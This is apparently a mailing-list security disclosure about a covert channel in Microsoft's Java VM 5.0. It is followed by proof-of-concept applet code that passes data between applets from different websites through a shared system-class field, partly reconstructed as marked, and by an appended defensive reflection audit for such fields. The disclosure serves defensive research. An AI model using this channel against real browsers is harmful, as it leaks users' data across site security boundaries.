Covert Channel in MSJVM, 5.0 Release

Hi y'all,
I have not found the contact address for Microsoft JVM
security issues, so maybe someone who reads
Bugtraq can forward this:
In the Microsoft (R) VM for Java, 5.0 Release,
the implementation of some core system classes allows
covert channels to be created between applets that are
loaded from different websites (aka cross-site Java).
These applets share a common class loader for
the system classes, so all public static (non-final)
fields can be used to create a covert channel in accordance
with the sandbox restrictions and exchange cross-site
information. This may be used for security zone violation
and general data leakage.

When you load the two applets into two windows of the same IE (if you use Ctrl+N),
you can use the commands

PUT/Key/Value  to create an entry in the shared hashtable of the applets
GET/Key to read an entry in the shared hashtable of the applets

'Key' and 'Value' are string values. 

So if you enter 'PUT/TopScorer/Makaay' in the lower textbox and press "Perform
Action", then switch to applet B, which has an identical look, and enter
'GET/TopScorer' and press "Perform Action", you will be prompted with 'Makaay',
which is information that should only be known to applet A.
For a demonstration try it yourself or look at the first screenshot below [pic1].

I think this is a major violation of sandbox constraints.
The prerequisite is that both applets are started by the same IE process (use Ctrl+N),
as the JVM and its memory are shared. Having two IE processes means two JVMs and of
course no covert channel, and you get an error like in the second screenshot [pic2].

Marc Schoenefeld 

P.S: Read some more java stuff at

P.P.S: Thanks to Siva Subbu for the remarks concerning the error messages 

pic1, how it should look

pic2, oops, you did not use Ctrl+N

// CovAppletFNMap.java
import java.awt.datatransfer.DataFlavor;
import java.net.*;
import java.util.*;
import java.awt.*;
import java.awt.event.*;

public class CovAppletFNMap extends java.applet.Applet {
    TextArea ta;
    TextField tf;
    Button bu;
    Label la1;
    Label la2;

    class MyButtonListener implements ActionListener {
        public void actionPerformed(ActionEvent event) {
            // Pass the command typed by the user to the shared FileNameMap
            String b = URLConnection.fileNameMap.getContentTypeFor(tf.getText());
            // Show the result (display call missing from the posted listing; assumed)
            ta.setText(b);
        }
    }

    public CovAppletFNMap() {
        la1 = new Label("PUT/Key/Value to put in shared Hashtable");
        la2 = new Label("GET/Key to get from shared Hashtable");
        tf = new TextField("", 40);
        ta = new TextArea("", 5, 40, TextArea.SCROLLBARS_NONE);
        bu = new Button("Perform action");
        bu.addActionListener(new MyButtonListener());
        // The add() calls were missing from the posted listing; the order is assumed
        add(la1);
        add(la2);
        add(ta);
        add(tf);
        add(bu);
    }

    public void start() {
        // URLConnection.fileNameMap is a public static non-final field of a
        // system class, so every applet in the same VM sees the same object
        if (URLConnection.fileNameMap == null)
            URLConnection.fileNameMap = new FNMAP();
        String i = URLConnection.fileNameMap.getContentTypeFor("GET/Bayern");
    }

    public static void main(String[] a) {
        new CovAppletFNMap().start();
        String i = URLConnection.fileNameMap.getContentTypeFor("GET/Bayern");
    }
}

// FNMAP.java
import java.net.*;
import java.util.*;

public class FNMAP implements FileNameMap {
    public FNMAP() {
    }

    // Table shared by every applet that reaches this FNMAP instance
    Hashtable ht = new Hashtable();

    // Interprets the "file name" as a command: PUT/Key/Value or GET/Key
    public String getContentTypeFor(String s) {
        int i = 0;
        StringTokenizer t = new StringTokenizer(s, "/");
        String action = "";
        String key = "";
        String value = "";
        while (t.hasMoreTokens()) {
            String tok = t.nextToken();
//          System.out.println(tok);
            if (i == 0) { action = tok; }
            if (i == 1) { key = tok; }
            if (i == 2) { value = tok; }
            i++;
        }
//      System.out.println("action"+action+"key"+key+"value"+value);
        // Throws a NullPointerException if the key is not in the table
        if (action.equals("GET")) { return ht.get(key).toString(); }
        if (action.equals("PUT")) { ht.put(key, value); return key; }
        return "";
    }
}
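
Added example, not part of the original post or of any Microsoft code: a small reflection-based audit that lists the public static non-final fields of a class, the kind of shared state the post describes. MutableStaticAudit and SharedRegistry are hypothetical names, and SharedRegistry is a constructed stand-in shaped like URLConnection.fileNameMap in the listing above.

```java
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.ArrayList;
import java.util.List;

// Lists public static non-final fields, i.e. VM-wide mutable state that any
// code sharing the defining class loader can read and write.
public class MutableStaticAudit {

    // Constructed sample class (assumption, for illustration only)
    public static class SharedRegistry {
        public static Object handler;              // flagged: writable by anyone
        public static final String NAME = "demo";  // not flagged: final
        static Object internal;                    // not flagged: not public
        public Object perInstance;                 // not flagged: not static
    }

    // Returns "Class.field : Type" for every public static non-final field
    public static List<String> findMutableStatics(Class<?> c) {
        List<String> hits = new ArrayList<>();
        for (Field f : c.getDeclaredFields()) {
            int m = f.getModifiers();
            if (Modifier.isPublic(m) && Modifier.isStatic(m) && !Modifier.isFinal(m)) {
                hits.add(c.getName() + "." + f.getName() + " : " + f.getType().getName());
            }
        }
        return hits;
    }

    public static void main(String[] args) throws ClassNotFoundException {
        // With no arguments, audit the constructed sample; otherwise audit
        // the class names given on the command line.
        if (args.length == 0) {
            args = new String[] { SharedRegistry.class.getName() };
        }
        for (String name : args) {
            // Load without running static initializers
            Class<?> c = Class.forName(name, false, MutableStaticAudit.class.getClassLoader());
            List<String> hits = findMutableStatics(c);
            System.out.println(name + ": " + hits.size() + " public static non-final field(s)");
            for (String h : hits) {
                System.out.println("  " + h);
            }
        }
    }
}
```

Run without arguments it reports only SharedRegistry.handler; pass fully qualified class names as arguments to audit other classes on the class path.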